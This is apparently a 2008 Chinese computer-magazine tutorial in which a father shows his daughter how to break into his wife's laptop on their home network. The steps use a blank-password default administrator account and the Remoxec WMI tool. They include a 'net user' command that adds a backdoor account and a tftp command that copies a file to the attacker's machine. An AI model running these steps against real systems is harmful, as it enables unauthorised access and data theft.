利用默认系统服务远程入侵

　　女儿练好琴后，来到书房找我“传道授业”，我通知老婆打开笔记本电脑后，就叫女儿先扫描老婆的电脑。不一会儿，女儿就向我报告：“妈妈笔记本电脑的IP地址是192.168.150.128，端口开放了80、110、135、139，怎么比以前多了135、139端口(图1)？”

　　图片来源于电脑报(www.shudoo.com)2008年第44期F版

　　那是我特意为女儿准备的，给笔记本电脑安装了“电脑公司GhostXP”系统，该系统默认有一个用户名为New，密码为空的管理员帐号。要我们知道管理员的用户名和密码，而且对方的135端口和WMI服务开启，我们就可以在对方的机器上执行任意命令。

　　小知识： WMI是Windows Management Instrumentation服务的简称，是默认启动的(图2)，可以用来进行远程电脑的管理。

　　图片来源于电脑报(www.shudoo.com)2008年第44期F版

　　我先运行WMI入侵工具Remoxec.exe，工具的在“地址”栏里写入老婆笔记本电脑的IP地址192.168.150.128，在“用户名”中填入“New”，密码折为空(图3)。然后，我在“命令或程序名”中输入要执行的命令。

　　图片来源于电脑报(www.shudoo.com)2008年第44期F版

　　我输入的是net user baby 123456 /add，意思是在老婆笔记本电脑上新建一个用户名为baby，密码为123456的账户。命令成功执行后，会弹出一个对话框，提示命令已成功执行并标注PID值。

　　接着，我用运行了FTP软件tftpd32.exe，利用它就可以把我的电脑当做一台简单的FTP服务器，将老婆笔记本电脑里面的工作.xls上传到我的电脑中。我又在Remoxec.exe的“命令或程序名”中输入了一句命令：tftp -i 192.168.150.1(这是本机的IP地址) put c:\DOCUME~1\new\桌面\工作.xls。点击“运行”后显示执行成功(图4)，我把电脑交给女儿操作，她模仿我的操作步骤后，很快就得到了工作.xls文件，兴奋地跑到老婆那里去炫耀了。

　　图片来源于电脑报(www.shudoo.com)2008年第44期F版